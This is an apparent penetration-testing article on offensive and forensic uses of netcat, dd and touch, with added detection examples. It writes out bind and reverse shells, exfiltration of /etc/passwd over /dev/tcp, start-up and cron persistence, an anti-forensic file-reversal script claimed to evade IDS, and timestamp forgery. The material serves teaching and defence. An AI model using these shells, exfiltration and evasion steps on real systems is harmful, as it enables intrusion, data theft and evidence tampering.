Netcat has a number of pre-existing scripts that can allow it to act as a simple vulnerability scanner. It does this by connecting to the port to be tested, sending data that exercises a vulnerability and returning the result. A number of the commonly available test scripts include those for: 

1. RPC (Remote Procedure Calls) - both the *NIX (port 111) and Windows (port 135) versions 

2. FTP (proxy tests, PASV bugs, etc.) 

3. Password testing (along the lines of Brutus) - that is, you can try a dictionary attack and test a system's passwords 

4. Map and export a file system 

5. Test trust relationships (such as the "r" commands) 

6. SSL - yes, there is an SSL capable version of netcat and it can be used to test SSL links 

7. A Web and CGI scanner 

8. Many more ... 

Reporting the results is another issue; you know that the vulnerability is there, the output is just not pretty. 

Then there is scripting again: 

# perl -e 'print "A"x1024' | nc -v [host] [port] 

A little fuzzing never hurt... but then again... In the perl sample above, we see how we can send a large volume of data to a listening port. This all goes to show how a simple command can be made into a truly powerful tool. 


Testing and making connections to open ports with Netcat 

When testing a system, netcat has a few things you should remember: 

• It is faster than a speeding Telnet. 
• Easy to drop with a CTRL-C. 
• Handles raw data in a single bound. 

Yes, it's not a bird or a plane, it is netcat. Netcat is far faster than Telnet without the overhead and translation. This makes it superior for forensic data transfers. Unlike Telnet, netcat does not add characters (Telnet injects its own option-negotiation bytes into the stream). 

Next, netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server - even over UDP. You set up communications as follows: 


On the Server: 

# nc -l -p [port] -e /bin/csh 

Or in Windows: 

C:\> nc -l -p [port] -e C:\windows\cmd.exe 

If the aim is to have a UDP "telnet" style client over UDP 53, just run: 

# nc -l -u -p 53 -e /bin/csh 

Can we say a simple backdoor? (The "-e" option is missing from many netcat builds: OpenBSD nc does not have it, the traditional netcat only has it when compiled with GAPING_SECURITY_HOLE, while Nmap's ncat keeps it. Check the copy on the target before relying on it.) 

On the Client: 

# nc [ServerIPAddress] [port] 

So to connect to the listener above on UDP 53 at IP address 192.168.10.123 we would use: 

# nc -u 192.168.10.123 53 


It is all really easy when you think about it. This is why 
it is SO EASY to bypass firewalls and routers that allow 
DNS traffic (or any default rules). This is why it is CRITI- 
CAL that there are restrictions on all rules that have ANY 
system to ANY system access. 


Acting as a virtual server or honeypot 

Netcat can simulate any TCP or UDP service; the binary ones are far more complicated, but are still possible. If we take the simple example of a Web server that we wish to create as a honeypot, the process is to serve a page and log the results. 

Make a webserver: 

while true; do nc -l -p 80 -q 1 < /tmp/index.html; done 

Run the script line above, then you could log the netstat and other packets, set up snort, etc. Or you could integrate logging. Netcat's stdin is the page to serve, and whatever the client sends comes out of netcat's stdout, so the request is captured by reading that output line by line and timestamping it: 

while true; do 
    nc -l -p 80 -q 1 < /tmp/index.html | while read -r REPLY; do 
        echo "$(date) < $REPLY" >> log.txt 
    done 
done 

("-q 1" is a netcat-traditional option that closes the connection one second after EOF on stdin; not every nc build has it, and "-w" does a similar job on the others. The loop spawns one netcat per connection, so the port is briefly closed while the shell restarts it.) 

To add a proxy or client header and fool simple systems, type the request by hand (the blank line ends the headers): 

# nc google.com 80 
GET / HTTP/1.1 
Host: google.com 
User-Agent: Mozilla Version 2800.1 (one day) 
Referer: Not.my.site.com 

To make a log with times, etc., the script needs to be spawned - but the idea is there. This can be done for nearly any service or port but, of course, there are always simpler ways to do this. 


Netcat - the simple port-scan logger 

The following is a small script to make Netcat into a simple Port Scan Logger. A little more and it can become a simple Honeypot: 

# while true; do nc -v -l -w 3 -p [port to monitor] 2>&1 | /bin/record.sh >> /tmp/port_connections.txt; done 

This calls a script, /bin/record.sh, which timestamps everything netcat prints. With "-v" netcat reports each connection (including the peer's address) on stderr, which "2>&1" folds into the same stream; anything the client sends arrives on stdout. There are other ways to do this, but this is a quick and easy example. The script is as follows: 

#!/bin/sh 
# record.sh 
# Netcat helper to record port scan details: prefix every line with the time. 
while read -r REPLY; do 
    echo "$(date) < $REPLY" 
done 

This logs all connections to a single port, with the source IP address. This is a continuous loop. That is, when a connection is made (or the 3 second "-w" timeout expires), netcat will be respawned and ready to record another attempt. 

Alternatively, we can log to syslog by sending each line to the log host on UDP 514 (the number in angle brackets is the syslog priority, facility * 8 + severity, so 13 is user.notice): 

# echo '<13>message' | nc -w 1 -u loghost 514 

Now, if we want to monitor several ports, a little extra scripting and we have a simple port scan monitor, one background loop per port (the port list is just an example): 

for p in 21 23 25 80 110 143; do 
    ( while true; do nc -v -l -w 3 -p "$p" 2>&1 | /bin/record.sh >> "/tmp/port_$p.txt"; done ) & 
done 


Netcat to send files 

Netcat helps in sending files. We can tar and compress (or gzip) the files contained within a specified directory and then pipe the data through a netcat client. The "-w" option sets a timeout of a few seconds before netcat gives up on a connect or a final read. This covers the problem of temporary disconnects and intermittent traffic flow. 

To move a file from a listener to the netcat client we first need to configure a listener that serves the file: 

# nc -l -p 53 < /tmp/the_file_name.bin 

Next, a client that saves what it receives: 

# nc [IP Address of Listener] 53 > /tmp/the_file_name.bin 

Pushing a file from the client to the netcat listener. Again, we set up a listener: 

# nc -l -p 53 > /tmp/the_file_we_want_to_copy.bin 

And the client: 

# nc [IP Address of Listener] 53 < /tmp/the_file_we_saved.bin 

This is just the reverse of what we did at first. This allows the sending or receiving of files. These files are sent in binary format, but this also allows text to be sent. Some issues can occur (and require translation of line endings) when sending from *NIX to Windows. Netcat does not verify the transfer, so compare a checksum (md5sum or sha256sum) of both copies afterwards. 


Netcat is also able to be used as a Forwarder and Relay 

I am not going to go into detail here but, if you think about it, there is no reason why a single netcat listener is the end of what you can do. Chaining netcat can allow it to pass through multiple layers and systems. In Pen-tests, Red Teaming and even on the darker side of the fence, this technique is used to "drill" through firewalls and security systems. 

More than this, netcat can chain across different protocols. It is possible to pipe one connection type into another. A connection to DNS (UDP 53) can be changed to HTTP (TCP 80), etc. 

All of this just touches the surface of what netcat does. I would suggest that you search and find out more. There are always more uses of netcat. 


Netcat as a Trojan 

Netcat can also be used as a backdoor into a system and a remote shell. It is all too easy... 

The following starts netcat in listen mode, handing whoever connects a Korn shell: 

# nc -l -p [port] -e /bin/ksh 

Once you have run this on the host that you wish to Trojanise, use telnet (or another netcat) to connect to it. Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow you to selectively send connections to a valid service or the "Trojan". 

For instance, if you can obtain shell access through a DNS vulnerability with BIND, you could load a netcat startup and allow future access while patching the issue to stop further attacks. Even simple tools can be used in both positive and negative ways. 


A replay attack engine 

Netcat can be used as a replay attack engine. It works well for this purpose and is simple to use. The first part is to actually collect the information stream (the data) that you want to replay. This can be done by using another tool to create the stream or just capture (tcpdump or wireshark) a stream and alter the parts that do not fit. Change the times, IP addressing, destinations, values, etc. to make the captured stream suit what you want. To replay the data, netcat in client mode will suffice: 

$ cat file.capture.bin | nc [destination IP] [port] 

or even: 

$ nc [destination IP] [port] < file.capture.bin 

Either will work. Either netcat in listen mode, tcpdump, wireshark or tcpreplay can be used to make the initial capture. Note that netcat replays the application payload only: the bytes are re-sent inside a fresh TCP session, so anything that depends on the original sequence numbers, timing or a server challenge will not replay. tcpreplay works better for packet-level replay, but netcat just looks cooler (in a geek sense). 

Hence, netcat can be used to replay captured data. 


Egress filtering and netcat 

First I had better explain to everyone what Egress filters are. Most people understand the idea of Ingress filtering. This is stopping things coming into the network. Most people will agree that letting anything into the network from the Internet willy-nilly is a bad idea. But what are Egress filters and why are they necessary? 

An Egress filter is a block on traffic leaving your network. This may not sound too nefarious, but it is not just the insiders who can damage your network from the inside. An external attacker can "push" a session from the client to a listener. That is, they can make a shell connection from your server using outgoing traffic to get an incoming connection to your internal systems. 


Shoveling a shell 

You may think that it is not possible to get an incoming shell from the Internet because you block incoming traffic. If you do, you are mistaken. There is an attack method known as shoveling a shell or just a shoveling shell. Netcat is a common tool for launching this attack. The attacker would set up netcat as follows: 

Listener (on the attacker's host): 

# nc -l -p [port no] 

Client (on the victim): 

# nc [listenerIP] [port] -e /bin/sh 

The firewall will see this as an outgoing connection from the system. It is, in reality, an incoming interactive shell. It is also a common way of using that buffer overflow condition - take your pick of the latest one hitting the streets. 

Generally, the client is activated at regular intervals through cron. The attacker starts a netcat listener and waits for the connection from the system being attacked. The system being attacked is generally configured to use a common port that is allowed through your firewall and expected. Ports such as TCP 25 (SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. If the attacker is really smart, they will tie the connection to UDP and bind it to something like UDP 53 (DNS) as it is rarely blocked (nc -u: UDP mode). 

The result - the attacker has a command shell to your system through your firewall. This even works on firewalls that block ALL incoming traffic. As a tester, you can do the same; packet filters are easily fooled, a good proxy level firewall is not - but there are fewer and fewer of these being used. 

The worst thing is that tools such as metasploit (http://www.metasploit.com/) make this even easier. They bundle the exploit and tools into a single payload that even a novice script kiddie can use. So filter that outgoing Internet traffic before it is too late! 


Oops - I forgot to install netcat... 

Netcat does not exist on all systems. It is common on many Linux systems, but less commonly installed on UNIX. In the event that netcat is not installed as a client program on a system, and when we cannot install netcat, there are options in both /dev/tcp and /dev/udp: 

/dev/tcp/[IPaddress]/[port] 
/dev/udp/[IPaddress]/[port] 

These are not files on disk: bash (and ksh93) recognise the paths in a redirection and open a socket. They are therefore only available when the redirection is performed by one of those shells; /bin/sh on many systems is not bash, and csh knows nothing about them. 

So for our UDP 53 example this becomes: 

/dev/udp/192.168.10.123/53 

For the shell this becomes (typed into bash, which opens the socket and hands the descriptors to the program it starts): 

/bin/csh -i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1 
/bin/csh -i > /dev/udp/[IPaddress]/[port] 0<&1 2>&1 

And hence, we can obtain the functionality of netcat with the tools that exist on most *NIX systems. As an example, the script line below shovels a shell from the target host to a waiting Netcat listener. We can enter commands on the host that act as a reverse shell. 

/bin/csh -i > /dev/udp/192.168.10.123/53 0<&1 2>&1 

The critical point is that we can use netcat on our local system even when the remote system under test does not have netcat. And, of course, if netcat is not installed on the client, we can still use a makeshift client such as: 

# cat /etc/passwd > /dev/tcp/[IP_Address_of_Listener]/[Listener_Port] 


Filtering connections 

An exercise to try is to set up restrictions on the source IP that is allowed to connect. Some netcat variants can be configured to accept connections only from a predefined source IP address (Nmap's ncat has --allow and --deny options for this; the traditional netcat does not). This makes the connection operate like TCP Wrappers and is similar to a firewall for the individual service. 


Sending compressed files 

In this example, the data received is piped into tar. By running tar with the "v" option (verbose) we can see the filenames - they are printed to stdout (generally the screen). Omit this if you want to script or otherwise automate this process (less noise). To compress the output, also run tar with the "z" flag. This will automatically run the gzip compression program over the output. 

Note 

Not all implementations of tar support the "z" flag and it may be necessary to pipe the tar'd output to gzip in a separate step. 

To do this we use the commands: 

Client 

# tar cpzf - /[directory path]/[File] | /bin/nc -w 3 [Destination_Host_IP] [Listener-Port] 

or for an entire directory, just: 

# tar cpzf - /[directory path] | /bin/nc -w 3 [Destination_Host_IP] [Listener-Port] 

Listener 

# nc -l -p [Listener-Port] | tar xpvzf - 

On the listener we reverse the process in this example and restore the files. Start the listener first; the client connects to it. 

For the details on how to use tar see: http://www.linuxcommand.org/man_pages/tar1.html. 


Alternatively 

Together, dd and netcat make a great way to either back up a system (and all slack, etc.) or to remotely obtain a forensically sound copy of a partition, drive, memory, etc. Say we want to make an image of /dev/hdb1 (a partition, but the entire drive can also be copied with /dev/hdb), we can use the following commands: 

Listener (start this first) 

# nc -l -v -w 15 -p 1200 | dd of=/tmp/image_hdb1.dd 

Client 

# dd if=/dev/hdb1 | nc -v -w 15 [Netcat Listener IP] 1200 

There are other options with dd that can be incorporated and I have these in other posts. In this case, I have used TCP 1200 as the port, but this can be anything that is not in use. UDP can be used as well, but there is a larger chance of error, and an image sent that way cannot be trusted without a hash comparison. 

This image can now be cloned to other hosts, used as a backup to be restored to the original, if needed, or used for forensic analysis. You can also test the system remotely without leaving a further trail. Hash the source device and the image (md5sum or sha256sum) and keep both digests with the case notes; without them the copy is not forensically sound. 
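The dd-over-netcat pair above has no integrity check, so here is an added example (mine, not the article's) of the whole copy-and-verify step in shell. The socket is replaced with a plain pipe so it runs offline; on the wire the left half of the pipeline feeds the nc client and the right half is the nc listener piped into dd, exactly as above. It assumes GNU coreutils (sha256sum, head -c), constructs its own 16 KiB sample "device", and the function names image_and_verify, make_sample_device and padding_caveat are mine.

```sh
#!/bin/sh
# Added example, not from the article: image a "device" with dd and verify the
# copy by hash, the check a forensically sound copy needs. The network hop is
# a pipe here; on a real engagement the first dd feeds "nc -w 15 LISTENER 1200"
# and the second dd reads from "nc -l -p 1200". GNU coreutils assumed.

# image_and_verify SOURCE DEST: copy SOURCE to DEST with dd, then compare
# SHA-256 digests of both. Returns 0 when the digests match, 1 otherwise.
image_and_verify() {
    src=$1; dst=$2
    # conv=noerror keeps going past unreadable blocks; sync pads each short
    # read with NULs so later offsets stay aligned with the original device.
    # The source must be a whole number of blocks or the padding changes the hash.
    dd if="$src" bs=4096 conv=noerror,sync 2>/dev/null \
        | dd of="$dst" bs=4096 2>/dev/null
    src_sum=$(sha256sum < "$src" | cut -d' ' -f1)
    dst_sum=$(sha256sum < "$dst" | cut -d' ' -f1)
    printf '%s  %s\n%s  %s\n' "$src_sum" "$src" "$dst_sum" "$dst"
    [ "$src_sum" = "$dst_sum" ]
}

# Constructed sample "device": 16 KiB of random bytes, a whole number of blocks.
make_sample_device() {
    head -c 16384 /dev/urandom > "$1"
}

# The padding caveat made visible: a 100 byte file that is not block aligned
# comes back padded to 4096 bytes and the digests differ. Returns 0 when
# exactly that mismatch is observed.
padding_caveat() {
    tmp=${TMPDIR:-/tmp}/ddpad.$$
    head -c 100 /dev/urandom > "$tmp.src"
    if image_and_verify "$tmp.src" "$tmp.img" >/dev/null; then
        rc=1
    else
        [ "$(wc -c < "$tmp.img")" -eq 4096 ] && rc=0 || rc=1
    fi
    rm -f "$tmp.src" "$tmp.img"
    return $rc
}

# Usage: make_sample_device /tmp/dev.bin && image_and_verify /tmp/dev.bin /tmp/dev.dd
```

On a real block device the size is always a multiple of the sector size, so conv=sync only pads blocks that could not be read; the padding_caveat function exists to show why the same flags silently change the hash of an ordinary file.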


DD 

DD is the Swiss army knife of file tools - with /dev/tcp it can also be a network tool (but nc is simpler). 

First we need the basics for DD. For this we have the man page and some definitions. I have taken (blatantly paraphrased) the man file info for DD and included this below (which is simple to obtain - "man dd"). 

For the purpose of a task such as reversing files and swapping them, we need to concentrate on the following options: 

• bs - This is block size. Setting "bs=1" means that we can use dd as a byte level (instead of a block level) tool. A block size of one is a single byte; dd has no way to address individual bits. Although it does slow down the process from a block copy, we are not looking at how fast we can copy here. 

• skip - this tells dd to skip "n" input blocks. With bs=1, that is "n" bytes. 

What we are going to do is start with "skip" set to the last byte in the file and loop dd, copying byte "n - 1", then "n - 2", ... down to byte 0 (dd counts from zero). This means the last byte of the source becomes the first byte of the destination, the second last becomes the second, ..., and the first byte of the source becomes the last byte of the destination. 

In other words, for a file of n bytes we copy byte "n - 1 - i" of the source file to byte "i" of the destination file, for i = 0 ... n - 1. 


How to reverse a file with dd 

Reversing a file is actually fairly simple; a small shell script executed with the length of the file is all that is required. You can either use a default block size (where the individual blocks will be moved into a reverse order), or set the block size to 1 in order to completely reverse the file. The flag "bs=1" is added in order to copy the entire file in reverse - byte by byte. 

If the size of the file and its name are known beforehand, the script is particularly simple (note that this script uses the seq command, which is not found on all systems): 

j=[file size] 
F=[file to copy] 
: > "$F.out" 
for i in $(seq $((j - 1)) -1 0); do 
    dd conv=noerror bs=1 count=1 skip="$i" if="$F" 2>/dev/null >> "$F.out" 
done 


In the event that you do not know the size of the file, the following script can be used, or, if you want to incorporate this into a script that changes multiple files at once, you need to feed more information into the script (including a file descriptor). This script is a little messy (I have not made any effort to tidy it up), but does the trick. 

#!/bin/bash 
# 
# This is a small utility script that will reverse the file that a user inputs. 
# It is not coded securely and presumes the directory for a number of 
# commands - change this to run it in a real environment. The main thing is 
# a proof of concept anti-forensic tool. 
# 
# This script, by reversing files, will make the file undetectable as a type 
# of file by commercial file checkers. Run it in reverse to get the original back. 
# 
# Author: Craig S Wright 

# Set the file to reverse 
echo "Enter the name (and path if necessary) of the file you want to reverse:"; read FILE 

# Work out the file size 
SIZE_OF_FILE=`/bin/ls -l $FILE | awk '{print $5}'` 

i=0 

# The script - not pretty - but the idea was all I was aiming at. 
# skip=SIZE is past the end of the file, so this first dd copies nothing 
# and only truncates the output file. 
K=`expr $SIZE_OF_FILE - $i` 
/bin/dd conv=noerror bs=1 skip=$K if=$FILE count=1 2>/dev/null > $FILE.out 

i=`expr $i + 1` 
J_Plus=`expr $SIZE_OF_FILE + 1` 

# i runs from 1 to SIZE, so K runs from SIZE-1 down to 0: last byte first. 
while [ "$i" != "$J_Plus" ] 
do 
    K=`expr $SIZE_OF_FILE - $i` 
    /bin/dd conv=noerror bs=1 skip=$K if=$FILE count=1 2>/dev/null >> $FILE.out 
    i=`expr $i + 1` 
done 


To go a little further and add some options, I have included the following example. I have NOT added input checking or other NECESSARY security controls. This is quick and nasty only. Please fix the paths and input checking if you want to run it. 

The following script is called reverse.sh: 

#!/bin/bash 
# 
# reverse.sh 
# 
# Set the file to reverse - I DO NOT check if the file 
# actually exists - you should! 
echo "Enter the name (and path if necessary) of the file you want to reverse:"; read FILE 

# Default file output = FILE.out 
FILE_OUT=$FILE.out 

# Set the file where the reversed file is to be saved - I DO 
# NOT check if the file actually exists - you should! 
echo "Enter the name (and path if necessary) of the file you want the output saved as (must be different to the input):"; read FILE_OUT 
FILE_OUT=${FILE_OUT:-$FILE.out} 

# Set the block size. This defaults to bs=1 (one byte) for dd 
echo "Enter the block size (the default = 1 byte):"; read BS_SIZE 
BS_SIZE=${BS_SIZE:-1} 

# Work out the file size 
SIZE_OF_FILE=`/bin/ls -l $FILE | awk '{print $5}'` 

# skip and count are in blocks, not bytes, so work out how many blocks 
# the file holds (rounding the last partial block up). 
BLOCKS=`expr \( $SIZE_OF_FILE + $BS_SIZE - 1 \) / $BS_SIZE` 

i=0 

# The script - not pretty - but the idea was all I was aiming at. 
# The first dd (skip=BLOCKS) is past the end and only truncates the output. 
K=`expr $BLOCKS - $i` 
/bin/dd conv=noerror bs=$BS_SIZE skip=$K if=$FILE count=1 2>/dev/null > $FILE_OUT 

i=`expr $i + 1` 
J_Plus=`expr $BLOCKS + 1` 

while [ "$i" != "$J_Plus" ] 
do 
    K=`expr $BLOCKS - $i` 
    /bin/dd conv=noerror bs=$BS_SIZE skip=$K if=$FILE count=1 2>/dev/null >> $FILE_OUT 
    i=`expr $i + 1` 
done 

# The end... 

To use the previous script enter: 

$ ./reverse.sh 

Enter the name of the file you want to reverse and the block size (best left at 1 byte). This will return the bytewise reversed file. If you want to verify it - run it twice and use "diff" (or "cmp" for binaries) to validate that the same file is returned. This will reverse the reverse and get the original back. 

This works on text and binary files and, with a little tweaking, you can reverse headers but leave the body the same, reverse the body after skipping the file header and many more options. 

I have yet to find a forensic tool that will find reversed text if you are not looking for it. Also, this is a simple way of passing tools when an IDS/IPS is in use. The reversed files are not found in default scans. This has been tested with several of the leading IDS products. In all cases, it was possible to send tools without setting an alert. 

With time and practice, you can create a loader script that will take the reversed file and execute it directly into memory. This leaves no copy of the original file to be uncovered with a Host based IDS. 

The script example above has the file output written without checking if a file exists. The following is an example of how you can add a small amount of script to verify that you are not overwriting an existing file: 


if [ -f "$FILE_OUT" ] 
then 
    echo "The file [$FILE_OUT] that you are seeking to write already exists" 
    printf "Do you want to overwrite the existing file? ( y/n ) : " 
    read RESPONSE 
    if [ "$RESPONSE" = "n" ] || [ "$RESPONSE" = "N" ] 
    then 
        echo "The file will not be overwritten and the process will abort!" 
        exit 1 
    fi 
fi 


It is also a good idea to use the full path in a script. Users can change the path variables they are exposed to and, unless you set these (either explicitly or by adding a profile for the script to use), an attacker could use a system script to run their own binary. 

The key to successfully testing a system and validating the security state of that system is to think outside the box. For instance, there are several reasons why you would want to reverse a file for testing: 

• Attackers could do this to bypass filters, controls and other protections 
• Anti-forensics: finding the needle in a haystack is difficult - especially when the tools do not help 
• Pen Testing - just as in point 1 for attackers, the tester can use this to load tools without being detected by filters or through malware detection engines 

Once a file has bypassed the perimeter controls, getting it to work inside an organization is simple. Hence, a means to bypass controls is of interest to those on the attack side of the equation (both validly and less so). 

Next, it is a concern to the forensic professional. Hiding files through reversing them makes the process of discovery a proverbial search for the needle in a haystack. 

An interesting effect to try is to maintain the header on a bitmap file (i.e. skip the first portion of the file and reverse the later parts). What ends up occurring is that the image can be recreated upside down. All types of interesting effects can be found. 
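The header-preserving variant just described is a small change to the dd loop, so here is an added example (mine, not the article's reverse.sh) that does it in shell and checks the round trip: reverse_file keeps the first HEADER bytes in place and reverses the rest, and round_trip reverses twice and compares with cmp. It needs only dd, wc and cmp; the function names and the constructed sample input are my own.

```sh
#!/bin/sh
# Added example, not the article's script: reverse a file byte by byte with
# dd while optionally leaving the first HEADER bytes in place (the "keep the
# bitmap header, reverse the body" idea). Note that dd's bs=1 is one BYTE,
# not one bit; dd cannot address single bits. One dd process per byte is
# slow, so this is for small files, headers, or a proof of concept.

# reverse_file IN OUT [HEADER]: OUT = first HEADER bytes of IN unchanged,
# followed by the remaining bytes of IN in reverse order. HEADER defaults to 0.
reverse_file() {
    in=$1; out=$2; hdr=${3:-0}
    size=$(wc -c < "$in")
    [ "$hdr" -le "$size" ] || { echo "header longer than file" >&2; return 1; }
    # Copy the header unchanged; with count=0 this writes nothing but still
    # truncates OUT, so a stale output file never leaks into the result.
    dd if="$in" of="$out" bs=1 count="$hdr" 2>/dev/null
    # Walk from the last byte down to the first byte after the header, the
    # same skip=K / count=1 trick the article uses.
    i=$((size - 1))
    while [ "$i" -ge "$hdr" ]; do
        dd if="$in" bs=1 skip="$i" count=1 conv=noerror 2>/dev/null >> "$out"
        i=$((i - 1))
    done
}

# round_trip IN [HEADER]: reverse IN twice with the same header length and
# return 0 when the original file comes back byte for byte.
round_trip() {
    tmp=${TMPDIR:-/tmp}/rev.$$
    if reverse_file "$1" "$tmp.1" "$2" && reverse_file "$tmp.1" "$tmp.2" "$2" \
        && cmp -s "$1" "$tmp.2"; then
        rc=0
    else
        rc=1
    fi
    rm -f "$tmp.1" "$tmp.2"
    return $rc
}

# Usage: reverse_file image.bmp image.rev 54   (54 = size of a BITMAPINFOHEADER file header)
```

Reversing twice with the same HEADER value is the only verification the technique allows, since the reversed file by design no longer matches any signature a file-type tool would check.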

As always, the cards are stacked in favor of the attack- 
er. When in a contest that pits rules against open moral- 
ity, rules lose more than not. This does not mean that we 
give up, only that we have to understand the odds that are 
stacked against us and that it is also the case that people 
naturally err. This is when we (the “good” guys) win. 

For security professionals to be successful, we need to 
think outside the box. 


touch 

The *NIX touch command can be used to change the access and modification times on an existing file or directory or to create a new file. There is a common belief that the touch command can change any time entry (including the change time or, on some systems, the create time); this is not correct. The change time (ctime) is maintained by the kernel and is set to the current clock by the touch call itself, and the created time (where the file system keeps one) needs to be modified in other ways (such as extracting files from TAR archives). 

If a file does not exist on the system, the touch command will create it. The touch command can be used to update or create the access and modification times, setting these to a specified predefined value. If the option to set a new timestamp is not used, the command will set the current time. 

The command's options include: 

• -a: change the access time 
• -m: change the modification time 
• -r <file>: set the access and modification times of the file being changed to be the same as those of the named <file> 
• -t <time>: set the time specified by <time> when updating the access and modification times 

The touch command uses the format [[CC]YY]MMDDhhmm[.SS]. These are defined as follows: 

• MM: the two-digit numeric month, 
• DD: the two-digit numeric day, 
• hh: the two-digit numeric hour, 
• mm: the two-digit numeric minutes, 
• SS: the two-digit seconds, 
• CC: the first two digits of the year, and 
• YY: the last two digits of the year. 


The touch command can be used without options to set 
the current time. This is done to simulate an update to a 
file without actually accessing it. For an attacker, this can 
be used to hide an attack. Setting a false path can lead 
an investigator into checking the wrong files and wasting 
valuable time. 

For instance, running “touch /bin/sh” could be used to 
lead an investigator into checking the use of the “/bin/sh” 
command shell when another shell was really used. The 
contents of the “/bin/sh” file are not changed, the time- 
stamps are updated to reflect the system’s current date 
and time. Alternatively, an attacker could also change the 
timestamps of files to have these seem to have been ac- 
cessed at any other time (including a time in the future). 

lf you know that an administrator logs into a system 
at 9.30 am each day, you could set the files touched in 
the login process back to the prior date (for instance, to 
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09.30am on Monday 9th March 2009). 
touch -a -t ‘2009-03-09 9:32:21’ /bin/csh 


This command will change the access time of the “/bin/ 
csh” command shell to March O9th, 2009 at 9:32:21am. 

One unfortunate aspect of the touch command is that 
it is not recursive. You have to touch each file or create 
a script to do this. Fortunately, this is simple. For example, 
linking the find command to touch using exec will allow 
you to selectively update a number of files and even re- 
curse through directories: 
• find . -exec touch {} \;
• find . | xargs touch
• find . -print0 | xargs -0 touch

Where long file names and spaces are used, the last find form above (null-separated names) will handle them correctly.

The real secret is to use the touch command in scripts. 
As you run an attack to validate a system, update the ac- 
cess time to that which it previously was set to. 
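Because touch -t (and the utime() call behind it) rewrite only the access and modification times, while the inode change time (ctime) is stamped by the kernel from the current clock and cannot be set from user space short of changing the system clock, an investigator can look for the disagreement. The following is an added example, not code from the original article: it walks a directory and flags files whose atime or mtime is in the future or predates ctime by more than a day. The function names and thresholds are my own choices.

```python
import os
import tempfile
import time
from pathlib import Path

# Hypothetical thresholds for this added example (not from the article).
FUTURE_SLACK = 300          # seconds of clock skew tolerated before a "future" flag
BACKDATE_GAP = 24 * 3600    # atime/mtime older than ctime by more than this is suspect


def timestamp_anomalies(root, now=None):
    """Walk `root` and return [(path, reason), ...] for files whose atime or
    mtime looks forged.  touch -t / utime() rewrite atime and mtime only; the
    kernel sets ctime from the current clock, so a back-dated file shows
    atime/mtime far older than its ctime, and a future-dated file shows
    atime/mtime ahead of the clock.  (On *NIX; Windows st_ctime differs.)"""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort
            for label, t in (("atime", st.st_atime), ("mtime", st.st_mtime)):
                if t > now + FUTURE_SLACK:
                    hits.append((path, f"{label} is in the future"))
                elif st.st_ctime - t > BACKDATE_GAP:
                    gap = int(st.st_ctime - t)
                    hits.append((path, f"{label} predates ctime by {gap}s"))
    return hits


def demo():
    """Constructed scenario in a temporary directory: a normal file, a copy
    back-dated to 2009-03-09 09:32:21 (what `touch -a -t 200903090932.21`
    does, applied here to a scratch file rather than a system shell), and a
    file dated one day into the future.  Returns the sorted flagged names."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "normal.txt").write_text("untouched\n")
        backdated = Path(d, "csh-copy")
        backdated.write_text("#!/bin/sh\n")
        future = Path(d, "future.log")
        future.write_text("later\n")
        old = time.mktime((2009, 3, 9, 9, 32, 21, 0, 0, -1))
        os.utime(backdated, (old, old))       # atime and mtime only; ctime is now
        ahead = time.time() + 86400
        os.utime(future, (ahead, ahead))
        return sorted({os.path.basename(p) for p, _ in timestamp_anomalies(d)})


if __name__ == "__main__":
    print(demo())
```

The check is a heuristic: legitimate restores, archive extraction and some backup tools also set atime/mtime without touching ctime, so a hit is a lead to correlate with other evidence, not proof of tampering.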


Programming tools 

It is simple when compilers or other tools are installed on a system. In this event, a tester can simply add any tools that are desired by compiling them on the host. Source code can be uploaded over ASCII connections, such as telnet, so even a console can be used to load your favorite tools when compilers are installed.

In many cases, compilers and other similar tools have 
been restricted or (ideally) not installed on production sys- 
tems. Where this is the case, it is still common to discover 
many related tools (including disassemblers) on a host. 
Some of these tools are covered in this section. 

In many instances, systems will not have tools at your 
disposal that can easily be used to test privilege escala- 
tion. In this instance, it may be necessary to “roll your own” 
exploit. Stack and Heap overflows are all too common in 
software. Even where patches are available, it is all too 
common to find patches missing. This can be a result of 
legacy systems not functioning when the patch is applied, 
or a simple failure for any reason to have applied the patch. 

In these instances, an attacker could exploit a flaw in 
the software to gain additional privileges on the system 
(maybe even root). 


GDB / DBX 

The “gdb” command is a software debugger on Linux and “dbx” is essentially the same on UNIX. These commands are commonly found on systems where compilers have been removed, as many system administrators are uncertain of their use.

There are many useful tutorials on the web for both gdb 
and dbx. Some of these include: 


• http://www.ece.unm.edu/faculty/jimp/310/nasm/gdb.pdf
• http://dirac.org/linux/gdb/


These are highly advanced tools, so I have left them to the end of this paper. The boon of finding them on a system cannot be beaten. These tools are primarily used when looking for exploitable flaws on a system. If you can copy an executable from the system, it can be run and verified on another *NIX system. Any exploitable flaws can then be discovered and used in the testing and validation process.


objdump 
The “objdump” command is a disassembler similar to gdb. 
It is not a debugger. This difference means that you can 
disassemble the executable binary without actually hav- 
ing to execute it. This can come in handy when you are 
looking for poorly constructed binaries (e.g. those with 
stack overflows) but are not ready to execute these. 

This also gets around the issue where a binary has read 
privileges for a user account used by the tester but not 
execute rights. 


readelf 

The “readelf” command is similar to “objdump”, with more detailed information provided on ELF (Executable and Linking Format) headers. It is used in the analysis of executable binary files to view the GOT (Global Offset Table) and the PLT (Procedure Linkage Table).


ltrace / strace

The “ltrace” tool is used to intercept and record library calls. It is similar to “strace”. The “ltrace” command executes a program, recording all of the library calls made and any signals that are received. “strace” also records system calls as well as library calls.


Appendixes

The following pages are a list of Appendixes and provide “MAN” entries and external sources for the paper.

Appendix 1 - *NIX Commands

The following are a list of the “MAN” or manual pages for a couple of the commands listed in this paper. These will vary with respect to the system they are run on and it is essential to always familiarize yourself with the particularities of the system that you are working on. These pages are taken from the author’s system. They are direct entries from the *NIX “man” pages and have only been slightly modified for style and format. Not all commands used in this paper have been included. A small sample has been copied in order to help you become familiar with the output of the MAN command.
“date”

The “date” command displays the current time in the given FORMAT, or can be used to set the system date.

• date [OPTION]... [+FORMAT]
• date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]

The command options are:

-d, --date=STRING
display time described by STRING, not ‘now’

-f, --file=DATEFILE
like --date once for each line of DATEFILE

-r, --reference=FILE
display the last modification time of FILE

-R, --rfc-2822
output date and time in RFC 2822 format

